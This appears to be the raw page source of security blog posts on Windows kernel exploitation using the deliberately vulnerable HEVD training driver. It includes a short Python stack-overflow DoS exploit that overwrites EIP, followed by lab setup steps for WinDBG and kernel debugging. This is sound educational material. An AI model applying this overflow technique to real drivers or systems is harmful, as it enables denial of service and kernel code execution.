\",/*#__PURE__*/e(\"code\",{children:\"memcpy(&KernelBuffer, &UserBuffer, SizeOfUserBuffer)\"}),\" is performed, which is a classic example of buffer overflow because we control both the \",/*#__PURE__*/e(\"code\",{children:\"UserBuffer\"}),\" data and the \",/*#__PURE__*/e(\"code\",{children:\"SizeOfUserBuffer\"}),\" value:\"]}),/*#__PURE__*/e(\"img\",{alt:\"buffer overflow\",className:\"framer-image\",height:\"136\",src:\"https://framerusercontent.com/images/inoGYdFMRm0NQGlleIwBg1qXqw.png\",srcSet:\"https://framerusercontent.com/images/inoGYdFMRm0NQGlleIwBg1qXqw.png?scale-down-to=512 512w,https://framerusercontent.com/images/inoGYdFMRm0NQGlleIwBg1qXqw.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/inoGYdFMRm0NQGlleIwBg1qXqw.png 1920w\",style:{aspectRatio:\"1920 / 272\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"Great, it means that if we wanted to overflow the \",/*#__PURE__*/e(\"code\",{children:\"KernelBuffer\"}),\" variable, we should inject a payload with more than 2048 bytes, using the \",/*#__PURE__*/e(\"code\",{children:\"IOCTL\"}),\" code \",/*#__PURE__*/e(\"code\",{children:\"0x222003\"}),\". 
Let\u2019s create our exploit:\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:'#!/usr/bin/env python3\\n\"\"\"\\nHackSysExtremeVulnerableDrive Stack Overflow DoS.\\n\\nVulnerable Software: HackSysExtremeVulnerableDrive\\nVersion: 3.00\\nExploit Author: Andres Roldan\\nTested On: Windows 10 1703\\nWriteup: https://fluidattacks.com/blog/hevd-dos/\\n\"\"\"\\n\\nfrom infi.wioctl import DeviceIoControl\\n\\nDEVICE_NAME = r\\'\\\\\\\\.\\\\HackSysExtremeVulnerableDriver\\'\\n\\nIOCTL_HEVD_STACK_OVERFLOW = 0x222003\\nSIZE = 3000\\n\\nPAYLOAD = (\\n    b\\'A\\' * SIZE\\n)\\n\\nHANDLE = DeviceIoControl(DEVICE_NAME)\\nHANDLE.ioctl(IOCTL_HEVD_STACK_OVERFLOW, PAYLOAD, SIZE, 0, 0)',language:\"Python\"})})}),/*#__PURE__*/e(\"p\",{children:\"And check it:\"}),/*#__PURE__*/e(\"img\",{alt:\"Success\",className:\"framer-image\",height:\"662\",src:\"https://framerusercontent.com/images/zIECSVkqVvlXgpdk2pWGVLQHMs.gif\",srcSet:\"https://framerusercontent.com/images/zIECSVkqVvlXgpdk2pWGVLQHMs.gif?scale-down-to=1024 863w,https://framerusercontent.com/images/zIECSVkqVvlXgpdk2pWGVLQHMs.gif 1116w\",style:{aspectRatio:\"1116 / 1324\"},width:\"558\"}),/*#__PURE__*/t(\"p\",{children:[\"Great! We were able to overwrite \",/*#__PURE__*/e(\"code\",{children:\"EIP\"}),\" with our \",/*#__PURE__*/e(\"code\",{children:\"A\"}),\" buffer! 
Now the target machine is completely unusable and our \",/*#__PURE__*/e(\"code\",{children:\"DoS\"}),\" attack was successful.\"]}),/*#__PURE__*/t(\"p\",{children:[\"Also, as we showed in our previous exploitation posts, we control the execution flow when we control \",/*#__PURE__*/e(\"code\",{children:\"EIP\"}),\".\"]}),/*#__PURE__*/e(\"h2\",{children:\"Conclusions\"}),/*#__PURE__*/t(\"p\",{children:[\"This post was intended to cover the first part of interacting with a Windows driver, and we were able to perform a full Denial of Service of the victim machine. In the next post, we will use the proven ability to control the execution flow to \",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/blog/hevd-smep-bypass/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"execute code at kernel-level\"})}),\".\"]})]});export const richText5=/*#__PURE__*/t(i.Fragment,{children:[/*#__PURE__*/t(\"p\",{children:[\"This post will be the first of a new series in which we will get deep into Windows Kernel Exploitation. I\u2019ll be using \",/*#__PURE__*/e(r,{href:\"https://github.com/hacksysteam/HackSysExtremeVulnerableDriver\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"HEVD\"})}),\" (HackSys Extreme Vulnerable Driver) as the target and, just as we did with the Vulnserver series, there are going to be different articles on the ways to exploit it.\"]}),/*#__PURE__*/t(\"p\",{children:[\"Before dealing with vulnerabilities, we must set up the lab environment first. Kernel exploiting is different from application exploiting. When you are attacking an application, if something goes wrong, you can simply restart it. 
In kernel mode, you will likely get an infamous blue screen of death (\",/*#__PURE__*/e(\"code\",{children:\"BSOD\"}),\").\"]}),/*#__PURE__*/t(\"p\",{children:[\"This post will guide you through setting up a testing lab for kernel debugging on a Windows 10 target machine, and finally we will be able to install the \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\" driver that will be our kernel-space victim.\"]})]});export const richText6=/*#__PURE__*/t(i.Fragment,{children:[/*#__PURE__*/e(\"h2\",{children:\"Pre-requisites\"}),/*#__PURE__*/e(\"p\",{children:\"Unlike common user-land applications, the Windows Kernel is commonly debugged remotely. This is because, as I mentioned earlier, when you mess with kernel memory, you\u2019re likely making the OS unusable. For that, we will set up a testing environment with a target Windows system (the debuggee) and some tools on the debugger machine.\"}),/*#__PURE__*/e(\"p\",{children:\"The following are the tools needed to set up the environment:\"}),/*#__PURE__*/t(\"ul\",{style:{\"--framer-text-alignment\":\"start\",\"--framer-text-color\":\"rgb(0, 0, 0)\",\"--framer-text-stroke-width\":\"0px\",\"--framer-text-transform\":\"none\"},children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",style:{\"--framer-font-size\":\"16px\",\"--framer-text-color\":\"rgb(83, 83, 101)\"},children:/*#__PURE__*/t(\"p\",{children:[\"WinDBG. 
We\u2019ll use the version that\u2019s included in the \",/*#__PURE__*/e(r,{href:\"https://developer.microsoft.com/en-us/windows/downloads/windows-10-sdk/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"Windows 10 SDK\"})})]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",style:{\"--framer-font-size\":\"16px\",\"--framer-text-color\":\"rgb(83, 83, 101)\"},children:/*#__PURE__*/t(\"p\",{children:[\"WinDBG dark theme (optional): Because I like \",/*#__PURE__*/e(r,{href:\"https://github.com/lololosys/windbg-theme\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"fancy debugging\"})})]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",style:{\"--framer-font-size\":\"16px\",\"--framer-text-color\":\"rgb(83, 83, 101)\"},children:/*#__PURE__*/t(\"p\",{children:[\"Pykd: To run Python scripts on WinDBG. 
Download \",/*#__PURE__*/e(r,{href:\"https://githomelab.ru/pykd/pykd\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"here\"})}),\".\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",style:{\"--framer-font-size\":\"16px\",\"--framer-text-color\":\"rgb(83, 83, 101)\"},children:/*#__PURE__*/t(\"p\",{children:[\"Windbglib + Mona: Download \",/*#__PURE__*/e(r,{href:\"https://github.com/corelan/windbglib\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"here\"})})]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",style:{\"--framer-font-size\":\"16px\",\"--framer-text-color\":\"rgb(83, 83, 101)\"},children:/*#__PURE__*/t(\"p\",{children:[\"Windows 10 1703 (Creators Update): For now, we\u2019d only need the 32 bits \",/*#__PURE__*/e(r,{href:\"https://www.getmyos.com/windows-10-1703-home-pro-education-32-64-bit-free-download\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"version\"})})]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",style:{\"--framer-font-size\":\"16px\",\"--framer-text-color\":\"rgb(83, 83, 101)\"},children:/*#__PURE__*/e(\"p\",{children:\"A virtual machine player. I\u2019ll be using VMWare Workstation Player.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",style:{\"--framer-font-size\":\"16px\",\"--framer-text-color\":\"rgb(83, 83, 101)\"},children:/*#__PURE__*/t(\"p\",{children:[\"HackSys Extreme Vulnerable Driver: Our \",/*#__PURE__*/e(r,{href:\"https://github.com/hacksysteam/HackSysExtremeVulnerableDriver\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"target\"})}),\". 
We\u2019ll be using the latest stable release (\",/*#__PURE__*/e(\"code\",{children:\"HEVD v3.00\"}),\" to the date of this post).\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",style:{\"--framer-font-size\":\"16px\",\"--framer-text-color\":\"rgb(83, 83, 101)\"},children:/*#__PURE__*/t(\"p\",{children:[\"OSR Driver Loader: To load \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\" into the OS. Download \",/*#__PURE__*/e(r,{href:\"https://www.osronline.com/article.cfm%5earticle=157.htm\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"here\"})})]})})]}),/*#__PURE__*/t(\"p\",{children:[\"With all the requirements in place, we can start setting up our lab, which will be composed of a debugger machine, that will be the host machine from which we will run \",/*#__PURE__*/e(\"code\",{children:\"WinDBG\"}),\"; and the debuggee machine, on which we will install \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\" that will be running as a virtual machine.\"]}),/*#__PURE__*/e(\"h2\",{children:\"Setting up debugger\"}),/*#__PURE__*/t(\"p\",{children:[\"The first stage is to download and install the Windows 10 SDK. 
If you want to install only WinDBG, you can choose only the \",/*#__PURE__*/e(\"code\",{children:\"Debugging Tools for Windows\"}),\" option:\"]}),/*#__PURE__*/e(\"img\",{alt:\"Install Windows 10 SDK\",className:\"framer-image\",height:\"540\",src:\"https://framerusercontent.com/images/AUw5XubxUwutAFkHpIzBcz3nRuQ.png\",srcSet:\"https://framerusercontent.com/images/AUw5XubxUwutAFkHpIzBcz3nRuQ.png?scale-down-to=512 512w,https://framerusercontent.com/images/AUw5XubxUwutAFkHpIzBcz3nRuQ.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/AUw5XubxUwutAFkHpIzBcz3nRuQ.png 1920w\",style:{aspectRatio:\"1920 / 1080\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"Once installed, if you search for \",/*#__PURE__*/e(\"code\",{children:\"windbg\"}),\" on Windows, you should get something like this:\"]}),/*#__PURE__*/e(\"img\",{alt:\"windbg on Windows\",className:\"framer-image\",height:\"540\",src:\"https://framerusercontent.com/images/ACsnnLlRRRKJ9Ita1R6AgFn1xk4.png\",srcSet:\"https://framerusercontent.com/images/ACsnnLlRRRKJ9Ita1R6AgFn1xk4.png?scale-down-to=512 512w,https://framerusercontent.com/images/ACsnnLlRRRKJ9Ita1R6AgFn1xk4.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/ACsnnLlRRRKJ9Ita1R6AgFn1xk4.png 1920w\",style:{aspectRatio:\"1920 / 1080\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"The default \",/*#__PURE__*/e(\"code\",{children:\"WinDBG\"}),\" configuration provides a not so friendly UI. However we can use a dark theme for \",/*#__PURE__*/e(\"code\",{children:\"WinDBG\"}),\" (see the Pre-Requisites section). To do that, just download the \",/*#__PURE__*/e(\"code\",{children:\"dark.reg\"}),\" file and install it. 
You will get a much friendlier UI:\"]}),/*#__PURE__*/e(\"img\",{alt:\"windbg dark.reg\",className:\"framer-image\",height:\"515\",src:\"https://framerusercontent.com/images/lsEyG9ikJZqkRihraBDYxL8RBfY.png\",srcSet:\"https://framerusercontent.com/images/lsEyG9ikJZqkRihraBDYxL8RBfY.png?scale-down-to=512 512w,https://framerusercontent.com/images/lsEyG9ikJZqkRihraBDYxL8RBfY.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/lsEyG9ikJZqkRihraBDYxL8RBfY.png 1920w\",style:{aspectRatio:\"1920 / 1030\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"Next, we need to configure Windows symbol resolution. This is done by creating a new environment variable \",/*#__PURE__*/e(\"code\",{children:\"_NT_SYMBOL_PATH\"}),\" with the value \",/*#__PURE__*/e(\"code\",{children:\"srv*https://msdl.microsoft.com/download/symbols\"}),\", like this:\"]}),/*#__PURE__*/e(\"img\",{alt:\"Environment variables\",className:\"framer-image\",height:\"363\",src:\"https://framerusercontent.com/images/QwJQHS4rJQjNoK0Ftu5XaxqCmE.png\",srcSet:\"https://framerusercontent.com/images/QwJQHS4rJQjNoK0Ftu5XaxqCmE.png?scale-down-to=512 512w,https://framerusercontent.com/images/QwJQHS4rJQjNoK0Ftu5XaxqCmE.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/QwJQHS4rJQjNoK0Ftu5XaxqCmE.png 1920w\",style:{aspectRatio:\"1920 / 726\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"Now, we need to install our friend \",/*#__PURE__*/e(\"code\",{children:\"mona\"}),\". To do that, we need to grab the \",/*#__PURE__*/e(\"code\",{children:\"pykd.zip\"}),\" file located \",/*#__PURE__*/e(r,{href:\"https://github.com/corelan/windbglib/tree/master/pykd\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"here\"})}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"That ZIP has two files. 
The \",/*#__PURE__*/e(\"code\",{children:\"pykd.pyd\"}),\" file should be placed at \",/*#__PURE__*/e(\"code\",{children:\"C:\\\\Program Files (x86)\\\\Windows Kits\\\\10\\\\Debuggers\\\\x86\\\\winext\"}),\". Now run \",/*#__PURE__*/e(\"code\",{children:\"vcredist_x86.exe\"}),\" and follow the installing instructions.\"]}),/*#__PURE__*/t(\"p\",{children:[\"Now, all that\u2019s left is to download \",/*#__PURE__*/e(\"code\",{children:\"windbglib.py\"}),\" from \",/*#__PURE__*/e(r,{href:\"https://github.com/corelan/windbglib/raw/master/windbglib.py\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"here\"})}),\" and \",/*#__PURE__*/e(\"code\",{children:\"mona.py\"}),\" from \",/*#__PURE__*/e(r,{href:\"https://github.com/corelan/mona/raw/master/mona.py\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"here\"})}),\" and move them to \",/*#__PURE__*/e(\"code\",{children:\"C:\\\\Program Files (x86)\\\\Windows Kits\\\\10\\\\Debuggers\\\\x86\"}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"To check if that worked, load an executable on \",/*#__PURE__*/e(\"code\",{children:\"WinDBG\"}),\", type \",/*#__PURE__*/e(\"code\",{children:\".load pykd.pyd\"}),\" and then \",/*#__PURE__*/e(\"code\",{children:\"!py mona\"}),\". 
You should see something like this:\"]}),/*#__PURE__*/e(\"img\",{alt:\"Loading an executable on WinDBG\",className:\"framer-image\",height:\"538\",src:\"https://framerusercontent.com/images/CkykoYrXIduVvjRvYRinTAuPG0.gif\",srcSet:\"https://framerusercontent.com/images/CkykoYrXIduVvjRvYRinTAuPG0.gif?scale-down-to=512 512w,https://framerusercontent.com/images/CkykoYrXIduVvjRvYRinTAuPG0.gif?scale-down-to=1024 1024w,https://framerusercontent.com/images/CkykoYrXIduVvjRvYRinTAuPG0.gif 1650w\",style:{aspectRatio:\"1650 / 1076\"},width:\"825\"}),/*#__PURE__*/e(\"p\",{children:\"With that, our debugger machine is set.\"}),/*#__PURE__*/e(\"h2\",{children:\"Setting up the debuggee\"}),/*#__PURE__*/e(\"p\",{children:\"Now it\u2019s time to set up our target OS. The first thing is to launch a new virtual machine with a Windows 10 1703 (Creators Update) instance.\"}),/*#__PURE__*/e(\"p\",{children:\"It\u2019s recommended to disable the Windows Update service to avoid messing with our lab results.\"}),/*#__PURE__*/t(\"p\",{children:[\"With the target machine up and running, it\u2019s time to load \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\" in the system. This is done by copying the \",/*#__PURE__*/e(\"code\",{children:\"osrloaderv30.zip\"}),\" and \",/*#__PURE__*/e(\"code\",{children:\"HEVD.3.00.zip\"}),\" files to this target OS and uncompressing them. 
Then, we must run \",/*#__PURE__*/e(\"code\",{children:\"OSR Driver Loader\"}),\" (run the one in the \",/*#__PURE__*/e(\"code\",{children:\"WNET \u2192 i386 \u2192 FRE\"}),\" folder):\"]}),/*#__PURE__*/e(\"img\",{alt:\"OSR Driver Loader\",className:\"framer-image\",height:\"540\",src:\"https://framerusercontent.com/images/8vT8I0ijShxe20JPljsBOEshGg.png\",srcSet:\"https://framerusercontent.com/images/8vT8I0ijShxe20JPljsBOEshGg.png?scale-down-to=512 512w,https://framerusercontent.com/images/8vT8I0ijShxe20JPljsBOEshGg.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/8vT8I0ijShxe20JPljsBOEshGg.png 1920w\",style:{aspectRatio:\"1920 / 1080\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"Now browse for the \",/*#__PURE__*/e(\"code\",{children:\"HEVD.sys\"}),\" file, click on \",/*#__PURE__*/e(\"code\",{children:\"Register Service\"}),\" and then \",/*#__PURE__*/e(\"code\",{children:\"Start Service\"}),\":\"]}),/*#__PURE__*/e(\"img\",{alt:\"OSR Driver Loader gif\",className:\"framer-image\",height:\"394\",src:\"https://framerusercontent.com/images/PRSCqHgY9h8UnYADk0IxXYCIuc.gif\",srcSet:\"https://framerusercontent.com/images/PRSCqHgY9h8UnYADk0IxXYCIuc.gif?scale-down-to=512 512w,https://framerusercontent.com/images/PRSCqHgY9h8UnYADk0IxXYCIuc.gif?scale-down-to=1024 1024w,https://framerusercontent.com/images/PRSCqHgY9h8UnYADk0IxXYCIuc.gif 1038w\",style:{aspectRatio:\"1038 / 788\"},width:\"519\"}),/*#__PURE__*/t(\"p\",{children:[\"To check if that went well, open a terminal and type \",/*#__PURE__*/e(\"code\",{children:\"driverquery | findstr HEVD\"}),\". 
You should see something like this:\"]}),/*#__PURE__*/e(\"img\",{alt:\"driverquery | findstr HEVD\",className:\"framer-image\",height:\"312\",src:\"https://framerusercontent.com/images/blVHZnktwBFdD6dyuVYbpju8sy4.png\",srcSet:\"https://framerusercontent.com/images/blVHZnktwBFdD6dyuVYbpju8sy4.png?scale-down-to=512 512w,https://framerusercontent.com/images/blVHZnktwBFdD6dyuVYbpju8sy4.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/blVHZnktwBFdD6dyuVYbpju8sy4.png 1920w\",style:{aspectRatio:\"1920 / 624\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"Great! To ensure that the \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\" driver is loaded every time, open a terminal as administrator and run\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"> sc config HEVD start=system\",language:\"Markdown\"})})}),/*#__PURE__*/e(\"img\",{alt:\"Administrator command prompt\",className:\"framer-image\",height:\"235\",src:\"https://framerusercontent.com/images/VaDWRRJweqrpGy0y5trdFKOsFes.png\",srcSet:\"https://framerusercontent.com/images/VaDWRRJweqrpGy0y5trdFKOsFes.png?scale-down-to=512 512w,https://framerusercontent.com/images/VaDWRRJweqrpGy0y5trdFKOsFes.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/VaDWRRJweqrpGy0y5trdFKOsFes.png 1920w\",style:{aspectRatio:\"1920 / 470\"},width:\"960\"}),/*#__PURE__*/e(\"p\",{children:\"Now we must connect our target OS with the debugger. 
You need to launch a new terminal window as administrator:\"}),/*#__PURE__*/e(\"img\",{alt:\"Terminal window as administrator\",className:\"framer-image\",height:\"395\",src:\"https://framerusercontent.com/images/7rb1iYcD0CB4ZvI3ByTFn4kkWnQ.gif\",srcSet:\"https://framerusercontent.com/images/7rb1iYcD0CB4ZvI3ByTFn4kkWnQ.gif?scale-down-to=512 512w,https://framerusercontent.com/images/7rb1iYcD0CB4ZvI3ByTFn4kkWnQ.gif?scale-down-to=1024 1024w,https://framerusercontent.com/images/7rb1iYcD0CB4ZvI3ByTFn4kkWnQ.gif 1034w\",style:{aspectRatio:\"1034 / 790\"},width:\"517\"}),/*#__PURE__*/e(\"p\",{children:\"And then you need to enable remote debugging by issuing the following command:\"}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"> bcdedit /dbgsettings NET HOSTIP:192.168.20.31 PORT:50000\",language:\"Markdown\"})})}),/*#__PURE__*/t(\"p\",{children:[\"You need to replace the \",/*#__PURE__*/e(\"code\",{children:\"HOSTIP\"}),\" parameter with the IP of the debugger machine.\"]}),/*#__PURE__*/t(\"p\",{children:[\"This will return a key that \",/*#__PURE__*/e(\"code\",{children:\"WinDBG\"}),\" will use to wait for a connection with that identifier.\"]}),/*#__PURE__*/e(\"img\",{alt:\"Return of a key\",className:\"framer-image\",height:\"395\",src:\"https://framerusercontent.com/images/mSClhnBJE4ExcDs2fx5WOprGLeQ.gif\",srcSet:\"https://framerusercontent.com/images/mSClhnBJE4ExcDs2fx5WOprGLeQ.gif?scale-down-to=512 512w,https://framerusercontent.com/images/mSClhnBJE4ExcDs2fx5WOprGLeQ.gif?scale-down-to=1024 1024w,https://framerusercontent.com/images/mSClhnBJE4ExcDs2fx5WOprGLeQ.gif 1034w\",style:{aspectRatio:\"1034 / 790\"},width:\"517\"}),/*#__PURE__*/t(\"p\",{children:[\"On the debugger machine, set up \",/*#__PURE__*/e(\"code\",{children:\"WinDBG\"}),\" to listen 
for a connection with that key:\"]}),/*#__PURE__*/e(\"img\",{alt:\"Setup WinDBG\",className:\"framer-image\",height:\"518\",src:\"https://framerusercontent.com/images/n4uS6Dg9cKQqGhwsSPeIsLfauE.gif\",srcSet:\"https://framerusercontent.com/images/n4uS6Dg9cKQqGhwsSPeIsLfauE.gif?scale-down-to=512 512w,https://framerusercontent.com/images/n4uS6Dg9cKQqGhwsSPeIsLfauE.gif?scale-down-to=1024 1024w,https://framerusercontent.com/images/n4uS6Dg9cKQqGhwsSPeIsLfauE.gif 1065w\",style:{aspectRatio:\"1065 / 1036\"},width:\"532\"}),/*#__PURE__*/t(\"p\",{children:[\"Now, we need to make Windows start in \",/*#__PURE__*/e(\"code\",{children:\"DEBUG\"}),\" mode and restart. To do that, we should issue the following commands:\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"> bcdedit /debug ON\\n> shutdown -r -t 0\",language:\"Markdown\"})})}),/*#__PURE__*/e(\"p\",{children:\"The target OS will restart and the debugger machine should now get a connection from the target OS:\"}),/*#__PURE__*/e(\"img\",{alt:\"Debugger getting connection\",className:\"framer-image\",height:\"610\",src:\"https://framerusercontent.com/images/tNBsk0jWog0aEZA24sSt9IX28kU.gif\",srcSet:\"https://framerusercontent.com/images/tNBsk0jWog0aEZA24sSt9IX28kU.gif?scale-down-to=1024 907w,https://framerusercontent.com/images/tNBsk0jWog0aEZA24sSt9IX28kU.gif 1082w\",style:{aspectRatio:\"1082 / 1221\"},width:\"541\"}),/*#__PURE__*/t(\"p\",{children:[\"Great. 
Now break the execution (\",/*#__PURE__*/e(\"code\",{children:\"Debug \u2192 Break\"}),\") and type \",/*#__PURE__*/e(\"code\",{children:\".reload\"}),\" to load the debugging symbols:\"]}),/*#__PURE__*/e(\"img\",{alt:\"Loading debugging symbols\",className:\"framer-image\",height:\"454\",src:\"https://framerusercontent.com/images/bzRV9zBhwYnTMvzejOZEd2fefEA.png\",srcSet:\"https://framerusercontent.com/images/bzRV9zBhwYnTMvzejOZEd2fefEA.png?scale-down-to=512 512w,https://framerusercontent.com/images/bzRV9zBhwYnTMvzejOZEd2fefEA.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/bzRV9zBhwYnTMvzejOZEd2fefEA.png 1920w\",style:{aspectRatio:\"1920 / 909\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"To check if everything\u2019s working, type \",/*#__PURE__*/t(\"code\",{children:[\"x /f nt!\",/*#__PURE__*/e(\"strong\",{children:\"Create*Process\"})]}),\". This will list all the functions in the \",/*#__PURE__*/e(\"code\",{children:\"NT\"}),\" module that contain \",/*#__PURE__*/e(\"code\",{children:\"Create\"}),\" and \",/*#__PURE__*/e(\"code\",{children:\"Process\"}),\".\"]}),/*#__PURE__*/e(\"img\",{alt:\"type x /f nt!Create*Process\",className:\"framer-image\",height:\"456\",src:\"https://framerusercontent.com/images/qIAhsi7ZsdAyVvxmeIIiOG6pok.png\",srcSet:\"https://framerusercontent.com/images/qIAhsi7ZsdAyVvxmeIIiOG6pok.png?scale-down-to=512 512w,https://framerusercontent.com/images/qIAhsi7ZsdAyVvxmeIIiOG6pok.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/qIAhsi7ZsdAyVvxmeIIiOG6pok.png 1920w\",style:{aspectRatio:\"1920 / 913\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"Now, set a breakpoint in \",/*#__PURE__*/e(\"code\",{children:\"nt!MmCreateProcessAddressSpace\"}),\" and resume execution:\"]}),/*#__PURE__*/e(\"img\",{alt:\"Setting a 
breakpoint\",className:\"framer-image\",height:\"456\",src:\"https://framerusercontent.com/images/C8mucUQ7DEHMI7CZIizQO0lNwI.png\",srcSet:\"https://framerusercontent.com/images/C8mucUQ7DEHMI7CZIizQO0lNwI.png?scale-down-to=512 512w,https://framerusercontent.com/images/C8mucUQ7DEHMI7CZIizQO0lNwI.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/C8mucUQ7DEHMI7CZIizQO0lNwI.png 1920w\",style:{aspectRatio:\"1920 / 912\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"Great! But as we are going to debug \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\", we must add the debugging symbols to our environment. If you look at the folder \",/*#__PURE__*/e(\"code\",{children:\"HEVD.3.00\\\\driver\\\\vulnerable\\\\x86\"}),\" you can see several files, including the \",/*#__PURE__*/e(\"code\",{children:\"HEVD.sys\"}),\" driver file and \",/*#__PURE__*/e(\"code\",{children:\"HEVD.pdb\"}),\". The latter is the file containing the \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\" debugging symbols. 
To load it on our debugger, follow these steps:\"]}),/*#__PURE__*/t(\"ul\",{style:{\"--framer-text-alignment\":\"start\",\"--framer-text-color\":\"rgb(0, 0, 0)\",\"--framer-text-stroke-width\":\"0px\",\"--framer-text-transform\":\"none\"},children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",style:{\"--framer-font-size\":\"16px\",\"--framer-text-color\":\"rgb(83, 83, 101)\"},children:/*#__PURE__*/t(\"p\",{children:[\"Create a folder called \",/*#__PURE__*/e(\"code\",{children:\"C:\\\\projects\\\\hevd\\\\build\\\\driver\\\\vulnerable\\\\x86\\\\HEVD\"})]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",style:{\"--framer-font-size\":\"16px\",\"--framer-text-color\":\"rgb(83, 83, 101)\"},children:/*#__PURE__*/t(\"p\",{children:[\"Copy the \",/*#__PURE__*/e(\"code\",{children:\"HEVD.pdb\"}),\" file in that directory.\"]})})]}),/*#__PURE__*/e(\"img\",{alt:\"Loading it on our debugger\",className:\"framer-image\",height:\"315\",src:\"https://framerusercontent.com/images/kPO7nw96heOFWse7159o1PBc4.png\",srcSet:\"https://framerusercontent.com/images/kPO7nw96heOFWse7159o1PBc4.png?scale-down-to=512 512w,https://framerusercontent.com/images/kPO7nw96heOFWse7159o1PBc4.png?scale-down-to=1024 